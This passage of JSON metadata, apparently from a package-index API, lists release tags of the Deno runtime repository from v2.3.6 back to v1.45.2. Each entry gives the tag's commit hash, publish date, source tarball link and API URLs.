/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f